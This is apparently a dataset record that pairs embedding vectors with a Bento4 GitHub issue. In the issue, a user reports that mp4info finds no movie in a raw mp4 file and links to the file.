-0.015518338419497013, -0.0011471480829641223, 0.010165614075958729, -0.007991069927811623, -0.01719866879284382, -0.01868891529738903, 0.01611899957060814, 0.018323956057429314, -0.011526605114340782, 0.052462778985500336, 0.001846651895903051, 0.005808922462165356, 0.011382142081856728, 0.021791061386466026, 0.003930906765162945, 0.013602306134998798, -0.006344954948872328, -0.015997346490621567, -0.010340490378439426, -0.022597013041377068, -0.0056150383315980434, 0.022156020626425743, -0.014248587191104889, -0.017822138965129852, -0.0068543762899935246, 0.013070075772702694, -0.010659828782081604, -0.013389414176344872, -0.018810568377375603, -0.002357023535296321, -0.011526605114340782, 0.009526937268674374, -0.0032827253453433514, -0.005451567005366087, 0.009420490823686123, -0.0007208880269899964, 0.005862145684659481, 0.006504624616354704, -0.03591799736022949, 0.009717019274830818, 0.008112723007798195, 0.013731562532484531, 0.015259826555848122, -0.0106218121945858, 0.023661473765969276, -0.01391404215246439, 0.02597287856042385, -0.010986770503222942, -0.024041639640927315, 0.008736193180084229, -0.004919336177408695, -0.011283299885690212, -0.005622641649097204, 0.00031506179948337376, 0.004725452046841383, -0.006919004488736391, -0.00592297175899148, 0.006280327215790749, 0.010986770503222942, -0.028284281492233276, 0.0015909908106550574, -0.01126809325069189, 0.005820327438414097, 0.03567469120025635, -0.005786112509667873, -0.012781149707734585, -0.0032066924031823874, -0.007333384361118078, -0.011450571939349174, 0.009846275672316551, 0.008454871363937855, -0.0011994207743555307, -0.0009247515699826181, -0.02174544334411621, 0.017867758870124817, 0.007588095031678677, 0.007664127741008997, -0.006006608251482248, 0.008279995061457157, 0.005421154201030731, -0.018263129517436028, 0.0002525721793062985, -0.007512061856687069, -0.027584778144955635, -0.003499419428408146, 0.013222141191363335, -0.003773138392716646, 0.007534871809184551, -0.009526937268674374, -0.009116358123719692, 0.0034861138556152582, -0.011807926930487156, 0.007101483643054962, -0.0017867758870124817, -0.015982139855623245, 0.013123298063874245, -0.004113385919481516, -0.006713715381920338, 0.020985111594200134, -0.0006001855945214629, -0.0033701634965837, -0.02390477992594242, -0.0007574789342470467, -0.011465778574347496, 0.0015814866637811065, -0.007831400260329247, 0.017670072615146637, -0.002771403407678008, -0.0015159082831814885, 0.01249222457408905, -0.01405850425362587, 0.0019188831793144345, 0.017472386360168457, -0.013868422247469425, 0.003434791462495923, -0.010013547725975513, -0.016575196757912636, -0.023326929658651352, -0.0043909065425395966, -0.0005864046397618949, -0.001579585950821638, -0.005177848506718874, 0.017137842252850533, -0.00779338413849473, 0.011146440170705318, 0.005181650165468454, 0.01897784136235714, 0.01151139847934246, -0.006527434568852186, -0.007398012559860945, -0.0027010729536414146, 0.012978835962712765, 0.017776519060134888, -0.006976029369980097, -0.005801319144666195, 0.005588426720350981, 0.0070558637380599976, 0.030261140316724777, 0.00248247804120183, -0.010112390853464603, -0.00983106903731823, -0.00009177422907669097, 0.014636355452239513, -0.0017478088848292828, 0.03710411116480827, -0.0016337594715878367, 0.0037864441983401775, 0.004767270293086767, -0.01337420754134655, -0.017426766455173492, 0.04972559213638306, -0.010021151043474674, -0.0008011978934518993, -0.011655861511826515, 0.009336854331195354, -0.02624659612774849, -0.015662800520658493, -0.00234751938842237, -0.012317348271608353, 0.01017321739345789, 0.003415783168748021, 0.006394376512616873, -0.00964098609983921, -0.01018082071095705, 0.009656192734837532, 0.016666436567902565, 0.011739498004317284, -0.019692551344633102, 0.0037123120855540037, -0.01051536574959755, -0.00221256073564291, -0.015130570158362389, 0.027098165825009346, 0.014012884348630905, 0.005280492827296257, 0.004242642316967249, -0.03144725412130356, 0.001163305132649839, -0.00894148275256157, -0.008629747666418552, -0.012013216502964497, 0.010827101767063141, -0.009975532069802284, 0.03497518599033356, 0.0021783458068966866, 0.005531401839107275, 0.008698176592588425, 0.009815862402319908, 0.02350940927863121, -0.002423552330583334, 0.0010340489679947495, -0.018263129517436028, -0.01140495203435421, 0.02912064455449581, 0.0004580989188980311, -0.01195238996297121, -0.014719991944730282, -0.010340490378439426, 0.011883960105478764, 0.01847602240741253, -0.00575189758092165, 0.007143301889300346, 0.00021348644804675132, 0.003499419428408146, 0.0024691722355782986, 0.02027040161192417, -0.00042673529242165387, 0.00717751681804657, -0.00673272367566824, -0.012454207986593246, -0.025242961943149567, -0.015951726585626602, 0.006861979607492685 ]
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
I have mp4 file (raw). mp4info doesn't show any information about the file. "No movie found in the file" https://www49.zippyshare.com/v/GZ7021Ov/file.html
mp4info doesn't show info
https://api.github.com/repos/axiomatic-systems/Bento4/issues/632/comments
0
2021-08-01T13:49:29
2021-08-02T12:47:34Z
https://github.com/axiomatic-systems/Bento4/issues/632
957,497,106
632
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : mp4info doesn't show info Issue date: --- start body --- I have mp4 file (raw). mp4info doesn't show any information about the file. "No movie found in the file" https://www49.zippyshare.com/v/GZ7021Ov/file.html --- end body ---
302
[ -0.020216774195432663, 0.025445250794291496, -0.007474039681255817, -0.010296076536178589, 0.01724056527018547, 0.01701265759766102, 0.0005081844283267856, 0.05488559231162071, -0.01879570074379444, 0.031799860298633575, -0.008720830082893372, 0.012836579233407974, -0.001985815353691578, 0.017093095928430557, 0.0007281323196366429, 0.0075879935175180435, -0.026155786588788033, 0.005654127802699804, -0.0052619921043515205, 0.01620827615261078, 0.05244563892483711, 0.006394828669726849, 0.01716012693941593, 0.03767184168100357, -0.002354490105062723, -0.00472573796287179, -0.04705628380179405, 0.013144925236701965, -0.020659184083342552, -0.017870662733912468, 0.020833466202020645, 0.009806744754314423, -0.011475834995508194, 0.009156536310911179, 0.0454743355512619, 0.0335426852107048, 0.03547320142388344, 0.02326001599431038, -0.01261537428945303, 0.040513988584280014, -0.01823263429105282, -0.035714514553546906, -0.016744529828429222, 0.022911449894309044, -0.03676020726561546, 0.016449591144919395, 0.010617827996611595, -0.012849985621869564, -0.028957713395357132, -0.00005572013833443634, 0.00541951647028327, 0.019479425624012947, -0.013319207355380058, -0.02917221561074257, -0.0232332032173872, -0.000047367353545269, 0.013037674129009247, -0.00024194270372390747, -0.02162444032728672, 0.04394601285457611, -0.031049104407429695, 0.004236406181007624, 0.024640869349241257, 0.04874548688530922, 0.010772001929581165, -0.004662057850509882, 0.007762276101857424, 0.027697516605257988, -0.011335068382322788, 0.01804494671523571, -0.017776818946003914, 0.010235747322440147, 0.027912018820643425, 0.01846054196357727, 0.01016201265156269, -0.03474925830960274, 0.02551228180527687, 0.01300415862351656, -0.006136756390333176, 0.02639710158109665, -0.042015496641397476, 0.03370356187224388, -0.07003476470708847, 0.02595469169318676, 0.002394709037616849, 0.015564771369099617, -0.023112546652555466, -0.059309687465429306, -0.039655979722738266, -0.0025304483715444803, 0.06408234685659409, -0.0077153537422418594, 0.03938785195350647, 0.002141664270311594, 0.008955441415309906, -0.014948079362511635, 0.030512850731611252, -0.00494023971259594, -0.044267766177654266, -0.03882478550076485, -0.012749438174068928, -0.02429230511188507, 0.0160473994910717, -0.03555363789200783, -0.007313163485378027, -0.0005119549459777772, 0.01336613018065691, -0.04340975731611252, 0.013104706071317196, 0.0727696642279625, 0.008955441415309906, 0.008137653581798077, -0.03627758100628853, -0.014492263086140156, 0.018742075189948082, 0.0656374841928482, -0.027241701260209084, -0.03131723031401634, -0.0005676751025021076, -0.014827421866357327, -0.027000386267900467, -0.026745665818452835, -0.02356836199760437, 0.007360085844993591, -0.015444113872945309, 0.07877570390701294, -0.015886522829532623, 0.00878786202520132, -0.008928628638386726, -0.031826671212911606, -0.04879910871386528, 0.00439393101260066, 0.004846394993364811, -0.0030197801534086466, -0.024962622672319412, -0.006592572201043367, -0.06359972059726715, 0.02559272013604641, -0.023997364565730095, -0.012849985621869564, -0.03764502704143524, -0.027107637375593185, 0.018675044178962708, 0.021450158208608627, -0.014465450309216976, -0.016422778367996216, -0.02151719108223915, -0.015149174258112907, -0.003834215924143791, 0.004648651462048292, 0.006394828669726849, -0.03933422639966011, 0.015564771369099617, -0.00030855549266561866, 0.046091027557849884, 0.026960168033838272, 0.024359336122870445, 0.008901815861463547, -0.029547592625021935, -0.025472063571214676, -0.002212047576904297, -0.026665227487683296, 0.025793815031647682, -0.02764389105141163, 0.0167713426053524, -0.03517825901508331, 0.005178202409297228, -0.008740939199924469, 0.006056318059563637, 0.021838942542672157, -0.004075529985129833, -0.023635393008589745, -0.0035861984360963106, 0.008915222249925137, -0.012293621897697449, -0.020605558529496193, 0.02151719108223915, 0.051399942487478256, -0.016328932717442513, -0.00452464260160923, -0.017522098496556282, -0.011844509281218052, 0.00264440244063735, -0.03378399834036827, -0.00004498458656598814, -0.015645209699869156, 0.055395033210515976, -0.02126246877014637, 0.013942603021860123, -0.008197982795536518, 0.016449591144919395, 0.014250949025154114, -0.007768979296088219, -0.03759140148758888, 0.043570633977651596, 0.004554807208478451, -0.01998886652290821, -0.04110386595129967, -0.03356949985027313, 0.03373037278652191, 0.01724056527018547, -0.007742166519165039, 0.016007181257009506, -0.0064585087820887566, 0.0011068617459386587, 0.030995478853583336, -0.025914473459124565, 0.039709605276584625, 0.013929196633398533, -0.03544638678431511, -0.04142561927437782, -0.031209981068968773, 0.01335272379219532, 0.027912018820643425, 0.00984026025980711, 0.021222250536084175, -0.02073962241411209, 0.006119998171925545, -0.02981572039425373, -0.004970403853803873, -0.0038844896480441093, -0.013982822187244892, 0.01801813393831253, -0.019801177084445953, -0.036492083221673965, -0.006371367257088423, -0.014760389924049377, -0.0038543252740055323, 0.033435434103012085, 0.005409461911767721, 0.03142448142170906, 0.024667682126164436, -0.01862141862511635, 0.008405780419707298, -0.0039984434843063354, -0.005952418781816959, 0.0007562018581666052, -0.04710990935564041, 0.004279976710677147, -0.00938444398343563, -0.0028002511244267225, 0.04799472913146019, -0.019586676731705666, 0.02175850421190262, 0.01126803644001484, 0.019171079620718956, -0.004015201702713966, -0.032711490988731384, 0.006803722120821476, -0.0006464374018833041, 0.02245563454926014, -0.0027516530826687813, 0.022576291114091873, 0.044535890221595764, -0.009518507868051529, 0.0080907316878438, 0.03166579827666283, -0.013486786745488644, -0.004095639567822218, -0.047672975808382034, -0.0056976983323693275, 0.0010859143221750855, 0.005506657995283604, -0.03788634389638901, 0.006528892088681459, -0.04147924482822418, -0.013848758302628994, -0.02906496450304985, -0.020256994292140007, 0.0011613250244408846, 0.009994433261454105, 0.01804494671523571, -0.037350088357925415, 0.018554387614130974, -0.0369747094810009, -0.005486548412591219, -0.0037906451616436243, -0.014693358913064003, -0.000098191034339834, -0.03855666145682335, 0.018165603280067444, 0.050702810287475586, -0.005476493388414383, -0.00005985725510981865, -0.0006590058328583837, 0.014867641031742096, 0.01612783782184124, -0.005305562634021044, -0.031933922320604324, 0.0026494297198951244, 0.042927131056785583, 0.03630439192056656, -0.028796838596463203, 0.0058820354752242565, -0.022187506780028343, 0.012789657339453697, -0.0029007988050580025, 0.04314162954688072, 0.024050990119576454, 0.040540799498558044, -0.014438637532293797, -0.004209593404084444, 0.0010649668984115124, 0.012059010565280914, -0.010430139489471912, 0.016677498817443848, -0.009545320644974709, 0.02728191949427128, 0.0026242928579449654, -0.038181282579898834, 0.03472244367003441, -0.023916926234960556, -0.04166693240404129, 0.016918811947107315, -0.017253970727324486, -0.007380194962024689, 0.002840470289811492, -0.04094298928976059, -0.03166579827666283, -0.016261901706457138, 0.014974892139434814, 0.015779273584485054, -0.012675702571868896, -0.006445102393627167, -0.010570906102657318, -0.039655979722738266, -0.018554387614130974, 0.005278749857097864, -0.016865186393260956, 0.009431366808712482, 0.01199197955429554, -0.018996797502040863, 0.04660046845674515, 0.02898452617228031, 0.04335613176226616, -0.030378786846995354, -0.015537958592176437, -0.02986934594810009, -0.016503214836120605, 0.003205793211236596, -0.021919380873441696, 0.026557978242635727, 0.02126246877014637, -0.032577428966760635, 0.003458837978541851, -0.02128928154706955, 0.01804494671523571, 0.009042582474648952, 0.004983810242265463, 0.0009174970327876508, 0.0008085704175755382, 0.004977107048034668, 0.002052847295999527, -0.024600651115179062, -0.017977913841605186, -0.019425800070166588, -0.031075917184352875, -0.005191608797758818, 0.014465450309216976, 0.009458179585635662, -0.011361881159245968, -0.026772478595376015, -0.00048556120600551367, 0.04643959179520607, -0.00210982421413064, 0.017173532396554947, -0.0197073332965374, 0.040406737476587296, 0.0042498125694692135, -0.024828558787703514, 0.012293621897697449, -0.002605859190225601, -0.09395169466733932, 0.047512102872133255, -0.039575543254613876, -0.005412813276052475, -0.01646299660205841, 0.04643959179520607, -0.030298348516225815, -0.005473142024129629, -0.03933422639966011, 0.007896339520812035, 0.02911859005689621, -0.03528551012277603, -0.015672022476792336, 0.014532482251524925, 0.0348028838634491, 0.01371469534933567, -0.021557409316301346, -0.023166170343756676, -0.018339885398745537, 0.0065858690068125725, -0.03196073696017265, -0.05255289003252983, 0.0026092107873409986, 0.030405599623918533, -0.03791315481066704, -0.00843929685652256, 0.0024516861885786057, 0.002039440907537937, 0.042042311280965805, 0.0009644192177802324, 0.05121225491166115, -0.014827421866357327, 0.009860369376838207, 0.059416938573122025, 0.017897475510835648, -0.0010029624681919813, 0.002205344382673502, -0.00452464260160923, 0.023300234228372574, 0.00802369974553585, 0.0013892329297959805, -0.00949169509112835, 0.012038901448249817, -0.0002662417246028781, -0.0064652119763195515, -0.002486877841874957, 0.005758027080446482, 0.05016655847430229, 0.014398419298231602, -0.034078940749168396, -0.02037765085697174, 0.007480742875486612, -0.000311697629513219, 0.008962144143879414, -0.02201322466135025, 0.002401412231847644, 0.0386907234787941, -0.06649549305438995, -0.018969984725117683, -0.010973096825182438, -0.0027449498884379864, -0.009431366808712482, 0.03126360476016998, -0.0010280994465574622, -0.00686405086889863, -0.036518894135951996, 0.006347906310111284, -0.006860699038952589, -0.0552341565489769, 0.05673566833138466, 0.004139210097491741, -0.01687859371304512, -0.003148816293105483, -0.012789657339453697, -0.036518894135951996, -0.056253042072057724, -0.007158990483731031, -0.016610465943813324, 0.02346111088991165, 0.017776818946003914, 0.012119339779019356, 0.016650686040520668, -0.003225902793928981, 0.004343657288700342, 0.014572701416909695, 0.017227157950401306, 0.011375287547707558, 0.008942035026848316, -0.0017713138367980719, 0.0034554863814264536, -0.0019455964211374521, 0.002795223845168948, 0.0009074422414414585, 0.01163000799715519, -0.02398395910859108, -0.015175987035036087, -0.0019724091980606318, 0.023796269670128822, -0.002029386116191745, -0.006481969729065895, 0.02831420861184597, 0.014666546136140823, -0.010952986776828766, 0.02362198755145073, -0.005459735635668039, -0.019037015736103058, 0.023608580231666565, -0.05110500380396843, -0.01301756501197815, -0.050729624927043915, -0.04255175217986107, -0.003173953155055642, -0.01372810173779726, -0.011542866937816143, -0.03461519256234169, -0.01801813393831253, -0.01807175762951374, 0.037403713911771774, -0.00212323060259223, 0.010725079104304314, -0.012762844562530518, -0.0019690576009452343, 0.015350270085036755, 0.029225841164588928, -0.00596917700022459, -0.0020629018545150757, 0.035017382353544235, 0.03804721683263779, 0.011757368221879005, 0.010316185653209686, -0.023407485336065292, -0.0025874252896755934, 0.018500762060284615, -0.016556840389966965, 0.008184576407074928, 0.02004249207675457, -0.04080892726778984, -0.00667636189609766, -0.012193074449896812, -0.006904269568622112, -0.0032661217264831066, -0.03938785195350647, -0.038985662162303925, -0.020163148641586304, -0.011234520934522152, 0.012474607676267624, 0.011710446327924728, 0.014250949025154114, -0.0469222217798233, 0.010182121768593788, -0.002827063901349902, 0.01931854896247387, -0.02600831724703312, 0.019130859524011612, 0.007648322265595198, -0.0002509501064196229, -0.008794564753770828, 0.0019305142341181636, -0.0063914768397808075, -0.007386898156255484, 0.010349701158702374, 0.04003135859966278, 0.00018192834977526218, 0.009009066969156265, -0.006709877867251635, -0.0013506896793842316, -0.0030599990859627724, -0.012984049506485462, -0.002612562384456396, 0.05190938338637352, -0.00560720544308424, -0.007621509488672018, -0.044509079307317734, -0.01078540738672018, 0.014358200132846832, 0.03383762389421463, 0.008432593196630478, -0.0037705355789512396, 0.019559863954782486, 0.006998114287853241, 0.03142448142170906, 0.002481850329786539, 0.005784839391708374, 0.04408007487654686, 0.011784180998802185, 0.021798724308609962, 0.013124816119670868, 0.032765116542577744, -0.0014889426529407501, 0.03230930119752884, 0.011335068382322788, 0.011133972555398941, 0.01120100449770689, 0.027992457151412964, -0.002002573339268565, -0.007856120355427265, 0.0006426668842323124, -0.008620282635092735, 0.008472812362015247, -0.012179668061435223, 0.024667682126164436, 0.017870662733912468, 0.02761707827448845, 0.03466881811618805, -0.01165682077407837, -0.017441660165786743, -0.0007658376707695425, -0.0006581679335795343, 0.04735122621059418, -0.0025153663009405136, -0.014103478752076626, -0.0035794952418655157, -0.008513031527400017, -0.008419186808168888, 0.009169942699372768, 0.005721159279346466, -0.038261719048023224, -0.02198641188442707, -0.020833466202020645, 0.029601218178868294, -0.02098093554377556, -0.0012518177973106503, 0.00646186014637351, -0.033408623188734055, 0.018031539395451546, 0.0017629348440095782, 0.03633120656013489, 0.009913994930684566, 0.002111499896273017, 0.04322206974029541, -0.008700720965862274, 0.005664182361215353, -0.02553909458220005, 0.0027868447359651327, 0.029252653941512108, 0.012052307836711407, -0.04555477574467659, 0.028126521036028862, -0.004832988604903221, 0.0058351135812699795, 0.04810198023915291, 0.00100463826674968, 0.016865186393260956, 0.0028823651373386383, 0.02989615872502327, -0.0013389590894803405, 0.000408684165449813, -0.007413710933178663, 0.006411586422473192, -0.028662774711847305, 0.03619714081287384, -0.013661069795489311, 0.0032728249207139015, 0.02834102138876915, -0.014666546136140823, -0.009082801640033722, 0.018782295286655426, -0.01765616238117218, -0.02823377028107643, 0.028635961934924126, -0.021074781194329262, -0.038208093494176865, -0.038074031472206116, -0.02287123166024685, 0.060167696326971054, -0.0036063077859580517, 0.014545888639986515, -0.037403713911771774, 0.0384225957095623, -0.005409461911767721, -0.031933922320604324, 0.024252085015177727, -0.011495944112539291, 0.023139357566833496, -0.0008559115813113749, -0.011408803053200245, 0.015175987035036087, 0.015899930149316788, -0.03217523917555809, -0.017884070053696632, -0.007996886968612671, 0.007474039681255817, -0.004829637240618467, -0.013500193133950233, 0.0160473994910717, 0.031236793845891953, -0.007768979296088219, -0.013996228575706482, 0.012608671560883522, -0.014478856697678566, -0.004645300097763538, 0.009632461704313755, 0.014358200132846832, -0.008003590628504753, -0.006244007032364607, -0.007319866679608822, -0.008486218750476837, 0.0058183553628623486, 0.03292599320411682, -0.005841816775500774, 0.02439955435693264, -0.025887660682201385, 0.0030834602657705545, 0.006542298477143049, -0.01745506562292576, -0.028019269928336143, -0.010322888381779194, -0.005798245780169964, -0.01610102504491806, -0.0014855910558253527, 0.0009049285436049104, 0.007500852458178997, -0.01793769560754299, 0.003616362577304244, 0.004866504576057196, 0.009793338365852833, 0.02450680546462536, -0.025632940232753754, 0.01199197955429554, -0.010034652426838875, 0.030164284631609917, 0.035821765661239624, -0.005255288910120726, -0.03839578479528427, 0.019533051177859306, 0.0024919051211327314, -0.0015492711681872606, -0.01882251352071762, -0.023943739011883736, 0.008968847803771496, 0.006421640980988741, -0.009505101479589939, -0.0006853995728306472, 0.018648231402039528, -0.012206480838358402, 0.005667534191161394, 0.031209981068968773, -0.013862164691090584, -0.011442318558692932, 0.0052888048812747, 0.006579165812581778, 0.03300642967224121, -0.027362357825040817, 0.0026175896637141705, 0.0035560340620577335, 0.0023796269670128822, -0.006445102393627167, 0.0050106230191886425, 0.0005727024981752038, -0.020055897533893585, -0.017803631722927094, -0.0011705418583005667, -0.005184905603528023, 0.010135199874639511, 0.010014542378485203, -0.023890113458037376, 0.005332375410944223, 0.01257515512406826, -0.03397168964147568, -0.00770194735378027, 0.015175987035036087, 0.017079688608646393, -0.0320947989821434, 0.010637938044965267, 0.014492263086140156, -0.015980368480086327, 0.030512850731611252, 0.024158241227269173, -0.00917664635926485, 0.01200538594275713, -0.019586676731705666, -0.002103121019899845, 0.0015970313688740134, -0.007138880901038647, -0.003502408741042018, -0.008988956920802593, -0.01838010363280773, -0.013151627965271473, 0.011817696504294872, 0.02004249207675457, -0.004085585009306669, -0.07432480156421661, 0.006944488734006882, -0.011469131335616112, 0.05587766319513321, -0.013600741513073444, 0.03633120656013489, -0.012749438174068928, 0.026437319815158844, -0.020471494644880295, -0.009283896535634995, 0.014760389924049377, 0.01584630459547043, -0.003911302424967289, 0.017508691176772118, -0.002084687352180481, 0.00403195945546031, -0.007373491767793894, -0.0051312800496816635, -0.005741268862038851, -0.03946829214692116, 0.0025153663009405136, 0.020109523087739944, 0.0014462098479270935, -0.033354997634887695, 0.006622736342251301, 0.02112840674817562, -0.009726306423544884, -0.03230930119752884, 0.013848758302628994, -0.04003135859966278, 0.014532482251524925, 0.023836487904191017, -0.003219199599698186, 0.003760481020435691, -0.007165693677961826, -0.01685178093612194, -0.03394487500190735, 0.026611603796482086, -0.019854802638292313, 0.019908428192138672, -0.038905225694179535, 0.0014872668543830514, -0.016261901706457138, 0.02815333381295204, -0.012829876504838467, -0.0025472063571214676, 0.018058352172374725, 0.01409007329493761, 0.02312595210969448, -0.004682167433202267, -0.02126246877014637, 0.0037705355789512396, -0.0014596162363886833, -0.0014395067701116204, 0.0010356404818594456, -0.012595265172421932, 0.021637847647070885, -0.004779363516718149, -0.014773796312510967, 0.02287123166024685, 0.014197323471307755, 0.005148038268089294, 0.0011931650806218386, 0.0129505330696702, -0.015001704916357994, 0.007118771318346262, 0.024976028129458427, 0.013600741513073444, 0.01565861515700817, -0.03673339635133743, -0.015256425365805626, 0.02628985047340393, -0.01840691640973091, -0.027831580489873886, 0.04587652534246445, 0.010135199874639511, 0.01059101615101099, -0.005097764078527689, 0.012286919169127941, -0.015913335606455803, 0.017750006169080734, -0.011120566166937351, 0.010296076536178589, 0.0006812101346440613, 0.01887613907456398, -0.020525120198726654, 0.03536595031619072, -0.04070167616009712, 0.00017333989671897143, -0.050595562905073166, -0.02714785747230053, -0.00021596789883915335, -0.021409939974546432, -0.0013230390613898635, 0.00014097614621277899, 0.007420414127409458, 0.020109523087739944, 0.010456952266395092, 0.008070622570812702, -0.005486548412591219, 0.006897566374391317, -0.006944488734006882, -0.01993524096906185, -0.008445999585092068, -0.01695903204381466, 0.02984253317117691, -0.006622736342251301, 0.024332523345947266, -0.020082710310816765, -0.039736419916152954, 0.004588323179632425, -0.043597448617219925, -0.02567315846681595, 0.006978004705160856, -0.053196392953395844, -0.02512349747121334, 0.010999909602105618, 0.007112068124115467, -0.029708469286561012, -0.00009064996265806258, -0.0017847202252596617, -0.05512690916657448, -0.005396055523306131, -0.005861926358193159, 0.027831580489873886, -0.004430798348039389, -0.010101684369146824, -0.005690995138138533, 0.049844805151224136, 0.010450249537825584, 0.016690904274582863, 0.0048899659886956215, -0.022334977984428406, 0.0029879400972276926, -0.005573689471930265, -0.012219887226819992, 0.0010699941776692867, 0.00978663470596075, -0.008164466358721256, -0.029628030955791473, 0.006723284255713224, 0.01890295185148716, 0.02981572039425373, 0.004655354656279087, -0.05434934049844742, -0.010289372876286507, -0.018728669732809067, 0.005164796020835638, 0.004876559600234032, 0.04638596624135971, 0.011596491560339928, -0.005426219664514065, 0.013915790244936943, 0.013982822187244892, 0.013694585300981998, 0.014157104305922985, 0.03839578479528427, 0.0345347560942173, -0.013265582732856274, 0.017388034611940384, 0.007775682490319014, -0.033328182995319366, -0.006036208476871252, -0.03678702190518379, 0.015940148383378983, -0.010470358654856682, 0.06595923751592636, -0.027912018820643425, -0.01754891127347946, 0.010363107547163963, 0.03949510306119919, 0.025807222351431847, -0.03161217272281647, 0.0014671572716906667, 0.02173169143497944, -0.016811560839414597, 0.00003388245386304334, -0.006237303838133812, -0.025807222351431847, 0.0005144686438143253, 0.017481878399848938, -0.0025807220954447985, -0.005181553773581982, 0.00043109789839945734, 0.013372832909226418, 0.014130291528999805, -0.028662774711847305, -0.00010850763646885753, -0.013969415798783302, 0.0033415325451642275, -0.010919471271336079, -0.0003144207876175642, 0.03287236765027046, -0.004048717208206654, 0.01602058671414852, -0.0386907234787941, -0.033328182995319366, -0.000954364484641701, -0.019801177084445953, -0.005741268862038851, -0.00849292241036892, -0.017776818946003914, 0.03450794145464897, -0.017951101064682007, -0.04705628380179405, 0.0014395067701116204, 0.0011596492258831859, 0.02509668469429016, 0.024144833907485008, -0.027965644374489784, -0.01851416751742363, 0.03177304565906525, 0.020203368738293648, -0.026544570922851562, 0.006173623725771904, -0.006233952473849058, 0.002654456999152899, -0.014264355413615704, -0.02981572039425373, -0.024185054004192352, 0.03627758100628853, 0.007453930098563433, 0.02245563454926014, -0.008318639360368252, -0.002652781317010522, -0.02281760610640049, 0.007755572907626629, 0.0004185294674243778, -0.02009611763060093, 0.039709605276584625, -0.019090641289949417, 0.015175987035036087, -0.015470926649868488, 0.008238201960921288, 0.014934672974050045, -0.006059669889509678, -0.0027131098322570324, 0.03327455744147301, 0.005396055523306131, 0.01895657740533352, -0.041345179080963135, 0.047485288232564926, -0.0032409848645329475, -0.0009970972314476967, 0.005342429969459772, 0.017669567838311195, -0.03780590370297432, -0.00916323997080326, -0.00703833345323801, -0.01301756501197815, -0.007822604849934578, 0.00982685387134552, -0.008519735187292099, -0.00579489441588521, -0.01124122366309166, -0.019787771627306938, 0.0513463169336319, 0.011133972555398941, -0.0133795365691185, 0.015015111304819584, -0.009565429762005806, 0.00030792708275839686, 0.0001891552092274651, 0.00002486196899553761, -0.014827421866357327, 0.020605558529496193, 0.054617464542388916, -0.00014736510638613254, -0.012756140902638435, 0.011006612330675125, 0.004796121269464493, 0.006760151591151953, 0.021007748320698738, -0.004950294271111488, 0.0030331865418702364, 0.033435434103012085, 0.013091299682855606, 0.013795132748782635, 0.026571383699774742, 0.018420323729515076, 0.0011562976287677884, -0.006052966695278883, -0.01540389470756054, 0.016717717051506042, -0.011569678783416748, 0.009129723533987999, -0.0027600321918725967, 0.03633120656013489, 0.005345781799405813, -0.05209707096219063, -0.009833556599915028, -0.01745506562292576, 0.021436752751469612, 0.021222250536084175, 0.012715921737253666, -0.009672680869698524, 0.007909745909273624, -0.012668999843299389, -0.002367896493524313, 0.028635961934924126, -0.008318639360368252, 0.0029628032352775335, 0.0033264504745602608, 0.013252176344394684, -0.009619055315852165, 0.014934672974050045, -0.004028608091175556, -0.01796450838446617, -0.03558044880628586, 0.0015040248399600387, -0.010624531656503677, -0.00034961244091391563, -0.02393033355474472, 0.004430798348039389, 0.015551364980638027, 0.0012451147194951773, 0.0188493262976408, 0.010048058815300465, 0.009525210596621037, 0.00038668938213959336, -0.030191097408533096, 0.007675135042518377, 0.0019238110398873687, 0.02764389105141163, -0.006297632586210966, 0.010456952266395092, 0.005007271189242601, -0.00540611008182168, -0.006729987449944019, -0.01760253682732582, 0.02112840674817562, -0.01848735474050045, -0.006753448396921158, 0.003747074631974101, -0.00469892518594861, 0.0009309033630415797, -0.005727862473577261, -0.015162580646574497, -0.009082801640033722, 0.006471915170550346, -0.014720171689987183, -0.035044196993112564, 0.02014974318444729, 0.017884070053696632, 0.024855371564626694, 0.03367674723267555, 0.0042498125694692135, 0.007246131543070078, -0.006944488734006882, -0.0031840079464018345, -0.03432025387883186, 0.024453179910779, 0.019559863954782486, 0.005134631879627705, 0.006096537224948406, -0.0009627434192225337, -0.003281204029917717, 0.009987729601562023, 0.023823082447052002, 0.003954872954636812, 0.0209273099899292, 0.014438637532293797, -0.0029309631790965796, 0.007427117321640253, 0.0023276773281395435, 0.010570906102657318, 0.024989435449242592, -0.004042014013975859, -0.010885955765843391, -0.013902383856475353, -0.00801029335707426, 0.012219887226819992, -0.016141245141625404, 0.002872310345992446, -0.02486877702176571, 0.02242882177233696, -0.014197323471307755, 0.011107159778475761, -0.005409461911767721, -0.008110840804874897, 0.015672022476792336, 0.0017612591618672013, 0.011020018719136715, -0.019305143505334854, 0.016288714483380318, -0.019331954419612885, 0.005744620691984892, -0.006073076277971268, -0.015363676473498344, -0.023192983120679855, 0.04324888065457344, -0.003219199599698186, 0.003804051550105214, -0.01687859371304512, -0.015149174258112907, -0.023085733875632286, 0.00105491210706532, 0.03828853368759155, -0.01407666690647602, 0.0005597150884568691, 0.0005882035475224257, 0.0005186581402085721, -0.0034119158517569304, -0.02984253317117691, 0.0067635029554367065, 0.0050743031315505505, 0.015296644531190395, 0.013875571079552174, -0.006951191928237677, 0.009277193807065487, -0.053813084959983826, 0.015243018977344036, 0.0003508692898321897, 0.014519075863063335, 0.004377172794193029, -0.002748301485553384, 0.03292599320411682, -0.0039984434843063354, 0.026879729703068733, 0.013278989121317863, -0.0015903281746432185, 0.023796269670128822, -0.037296462804079056, -0.016664091497659683, 0.0041928356513381, 0.026557978242635727, -0.0011680282186716795, 0.019948648288846016, -0.007822604849934578, -0.002726516220718622, 0.00511452229693532, 0.006666306871920824, -0.03053966350853443, -0.013902383856475353, -0.01378172729164362, -0.010101684369146824, 0.008365562185645103, 0.015028517693281174, -0.008352155797183514, 0.010356404818594456, 0.002828739583492279, 0.0004981296369805932, 0.018916359171271324, -0.013238769955933094, -0.002419845899567008, -0.003609659383073449, 0.018782295286655426, 0.01654343493282795, 0.003787293564528227, 0.010932877659797668, 0.011596491560339928, -0.0006275846972130239, 0.011596491560339928, -0.009746415540575981, -0.038905225694179535, -0.029440343379974365, -0.020136335864663124, -0.0433025062084198, 0.0053826491348445415, -0.019023608416318893, -0.0007046711980365217, 0.015832899138331413, -0.009283896535634995, 0.010503874160349369, -0.01820582151412964, -0.008586766198277473, 0.002563964342698455, 0.005727862473577261, -0.0017796928295865655, 0.0022707004100084305, -0.02087368629872799, -0.01643618382513523, 0.045179396867752075, 0.026276445016264915, 0.0022086959797888994, 0.013956009410321712, 0.007252834737300873, -0.004333602264523506, 0.019854802638292313, -0.030512850731611252, 